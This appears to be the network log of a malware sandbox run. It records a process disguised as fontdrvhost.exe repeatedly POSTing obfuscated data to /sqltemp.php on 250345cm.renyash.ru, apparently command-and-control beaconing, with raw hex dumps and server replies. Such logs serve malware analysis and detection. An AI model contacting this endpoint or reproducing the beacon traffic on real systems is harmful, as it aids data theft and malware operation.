                                                                                                                                                                                            Jan 1, 2025 14:53:09.605319977 CET1012OUTData Raw: 56 5f 5f 5c 54 59 54 56 58 56 52 59 56 50 59 57 5b 53 54 5c 55 5d 50 5f 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: V__\TYTVXVRYVPYW[ST\U]P_Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.Z&/X Y='.'@;*9T#/+S)8[#2+Z(*%/4-&Y.,Y-
                                                                                                                                                                                            Jan 1, 2025 14:53:09.708282948 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                                            Jan 1, 2025 14:53:09.889786959 CET797INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 01 Jan 2025 13:53:09 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Uj1sI4UnIc0gFeYKQvkkcsRVJb42pCqsVyQFJgIub3czBWy1KKY0WN5Vzu4OneYDVuXxCieaBcUmUUnGw0E2HxU4S1c8zfC9EBBYLU1ysRpEXBC46wmj0uLKGENAr250248zvO0t"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8fb2fe73690c4375-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=4221&min_rtt=2392&rtt_var=4555&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=85746&cwnd=31&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                            Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 42W\X0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            87192.168.2.449933104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:53:10.010606050 CET319OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1012
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Jan 1, 2025 14:53:10.355782986 CET1012OUTData Raw: 56 57 5f 53 51 5c 54 50 58 56 52 59 56 51 59 52 5b 5a 54 58 55 5a 50 5b 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: VW_SQ\TPXVRYVQYR[ZTXUZP[Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S-0=4Y2$X7@;=R!=?:<(.<Y#Z?2??::&Y.,Y-
                                                                                                                                                                                            Jan 1, 2025 14:53:10.463035107 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                                            Jan 1, 2025 14:53:10.645745993 CET809INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 01 Jan 2025 13:53:10 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=l3nBjNQcEQN%2F1VyhfON2f7GyFPDU%2BXZ%2F87MFb84fHfLWpC5DRDXKHguo%2BNSgTTJVyRh0yR65jKIkLyE0kMXXdnxHY6sWSibZqfkrdhpgFx1PInnHOpCgFlQqSWcElGohZCgGH%2Fe2"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8fb2fe781a5441ad-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=3142&min_rtt=1684&rtt_var=3549&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=109322&cwnd=188&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                            Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 42W\X0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            88192.168.2.449940104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:53:10.986078024 CET319OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1012
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Connection: Keep-Alive


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            89192.168.2.449944104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:53:11.283698082 CET319OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1852
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Jan 1, 2025 14:53:11.636672974 CET1852OUTData Raw: 56 53 5f 51 54 5f 51 55 58 56 52 59 56 5b 59 55 5b 5b 54 5e 55 5f 50 5b 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: VS_QT_QUXVRYV[YU[[T^U_P[Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.3?>",!3>'.)& -Y<_?S);#!3Z+8=E&/8-:&Y.,Y-)
                                                                                                                                                                                            Jan 1, 2025 14:53:11.731230021 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                                            Jan 1, 2025 14:53:11.914792061 CET959INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 01 Jan 2025 13:53:11 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=j6h90KI4AKs2LmKdB%2BmPd2LRVD1G3SuKaap49eZpmHy6qPam3JrReHymzEnFzj9aaJka1FHS5dL%2FpKqaT9BJROuOw3y8Ou%2FPWU4HHjSjPEX2kl9uFOn%2FyTsBf4epk0%2BqOKIknI%2Bt"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8fb2fe8008718c41-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=4854&min_rtt=1912&rtt_var=6602&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2171&delivery_rate=57360&cwnd=224&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                            Data Raw: 39 38 0d 0a 00 1f 26 09 29 3d 29 0e 31 31 3b 01 2a 3e 2f 56 32 2d 32 58 3f 38 31 05 33 00 0d 11 28 29 0d 1e 36 3f 2d 59 24 3b 33 07 37 13 28 03 27 34 2b 59 05 1c 20 43 35 3f 01 07 29 03 09 58 26 2c 35 5b 26 3d 37 06 2a 3b 23 0c 20 15 33 1d 33 03 33 01 2a 03 30 1e 30 12 2c 02 3a 3f 07 53 27 3a 2c 54 00 11 26 55 27 1f 28 14 20 0e 3b 03 36 08 36 00 25 1d 35 0a 26 02 23 50 37 07 08 5c 32 0b 27 59 22 23 2e 5e 26 5d 21 58 21 2e 28 0a 29 2e 25 53 20 02 2d 48 05 3f 57 53 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 98&)=)11;*>/V2-2X?813()6?-Y$;37('4+Y C5?)X&,5[&=7*;# 333*00,:?S':,T&U'( ;66%5&#P7\2'Y"#.^&]!X!.().%S -H?WS0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            90192.168.2.449946104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:53:11.400451899 CET319OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1012
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Jan 1, 2025 14:53:11.746112108 CET1012OUTData Raw: 56 55 5f 55 54 5a 54 57 58 56 52 59 56 5f 59 53 5b 53 54 50 55 5d 50 5d 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: VU_UTZTWXVRYV_YS[STPU]P]Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.^3/: <2%.A/*-#=,+4)' ?2;.*&Y.,Y-9
                                                                                                                                                                                            Jan 1, 2025 14:53:11.847465992 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                                            Jan 1, 2025 14:53:12.111871004 CET804INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 01 Jan 2025 13:53:12 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AE7e12Xb6oR%2FCg2CAyf9AwqxLQoT5W8rLq%2FgID8eXXINhqvsksmqud9snMkLAmKGx8j7pD81qV2uQoa0dh6%2FdoFwvo5hPMEQWAJyVWTN2EQrF8GHPrj7wPGxiEOHPrxhNiHFoMHW"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8fb2fe80ca930c78-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=3731&min_rtt=1654&rtt_var=4775&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=79894&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                            Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 42W\X0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            91192.168.2.449952104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:53:12.227947950 CET295OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1012
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Jan 1, 2025 14:53:12.574110031 CET1012OUTData Raw: 53 53 5f 53 54 5a 51 56 58 56 52 59 56 5e 59 54 5b 58 54 59 55 54 50 59 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: SS_STZQVXVRYV^YT[XTYUTPYZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S-0Y!Z Y9_0=#D,!-<3)>X 7Y<.1?S::&Y.,Y-
                                                                                                                                                                                            Jan 1, 2025 14:53:12.676281929 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                                            Jan 1, 2025 14:53:12.947933912 CET806INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 01 Jan 2025 13:53:12 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=r5cCJymIJJll%2F2l8k%2F8jXDwweJgXAHnsCmXCw2OLvbilEd9i8rkZ%2BgYO%2BiVhbfPNgbe6aqh2qND4FdSkXQolQaYr7BXWcZl9ea1vV3B9cnIjKQdsnCUBmoJL36hllFNb8U8FcvW7"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8fb2fe85fc5d42df-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=4171&min_rtt=2143&rtt_var=4859&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1307&delivery_rate=79490&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                            Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 42W\X0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            92192.168.2.449958104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:53:13.072679043 CET319OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1012
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Jan 1, 2025 14:53:13.419900894 CET1012OUTData Raw: 53 57 5a 56 54 51 51 57 58 56 52 59 56 5b 59 54 5b 5e 54 5b 55 55 50 5c 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: SWZVTQQWXVRYV[YT[^T[UUP\Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.Y0![ Y:'.'.*1T#+7) Y723[?"2+R.*&Y.,Y-)
                                                                                                                                                                                            Jan 1, 2025 14:53:13.537457943 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                                            Jan 1, 2025 14:53:13.793407917 CET801INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 01 Jan 2025 13:53:13 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ni8yvXzZRSN1K3UjdqWLN1NOOmyH7kEV4viZEqWBmyMmig3wchjP4YBmgKj2PUt%2BM0HZzb5BdK9tLzHE24hGA7kCdSgqvPBtCPjt3TDuCkdsdbLWCKttErbzcLCqtuhyMIV8IHNx"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8fb2fe8b4f830f65-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=7803&min_rtt=1467&rtt_var=13223&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=27991&cwnd=221&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                            Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 42W\X0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            93192.168.2.449964104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:53:13.976294994 CET319OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1012
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Jan 1, 2025 14:53:14.324165106 CET1012OUTData Raw: 56 51 5f 57 51 5d 54 54 58 56 52 59 56 5b 59 51 5b 5a 54 59 55 5f 50 5f 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: VQ_WQ]TTXVRYV[YQ[ZTYU_P_Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S-&?9[ /!3E;.#$[(:4(=<]4"7(+%<?T,:&Y.,Y-)
                                                                                                                                                                                            Jan 1, 2025 14:53:14.428893089 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                                            Jan 1, 2025 14:53:14.694446087 CET810INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 01 Jan 2025 13:53:14 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Lu8z%2BQsTVTiRmpy%2F69dPknZYxT8I4tuLjBrNOvb5ijd3TBztZ7yZNvjpkhvFoPsfbZiB7uAi9Z1IZmOvq0qe7oAsNhrRaUOe3iwh%2FgVfxDu2%2FU%2BcEHO0GPr3InXkw7%2FQevX6fUYQ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8fb2fe90eaea0c9c-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=3516&min_rtt=1674&rtt_var=4312&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=88953&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                            Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 42W\X0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            94192.168.2.449971104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:53:14.828062057 CET319OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1012
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Jan 1, 2025 14:53:15.183478117 CET1012OUTData Raw: 53 54 5a 56 51 5f 54 51 58 56 52 59 56 5b 59 57 5b 5b 54 5d 55 5e 50 55 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: STZVQ_TQXVRYV[YW[[T]U^PUZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S._3?![41^$<.)>4=<Y(9<*4"0*+E27V-:&Y.,Y-)
                                                                                                                                                                                            Jan 1, 2025 14:53:15.299839020 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                                            Jan 1, 2025 14:53:15.480200052 CET812INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 01 Jan 2025 13:53:15 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tWqA95v6%2BJxphnwzhZ%2FmsbE7E2nBpTuLahMwW0N0pjkFvVSAEw5GEAQ9P7a%2FEa02tOyLQETBQogS1%2B93SRNH%2F3DULWMhi5%2FU4qieQvoI683WAbJIBUVCovINjGChJESiUUOKAWP%2F"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8fb2fe964fe04245-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=4492&min_rtt=1665&rtt_var=6280&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=60114&cwnd=192&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                            Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 42W\X0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            95192.168.2.449977104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:53:15.603885889 CET319OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1012
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Jan 1, 2025 14:53:15.949100018 CET1012OUTData Raw: 53 53 5f 52 54 5d 54 56 58 56 52 59 56 58 59 57 5b 59 54 50 55 58 50 5c 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
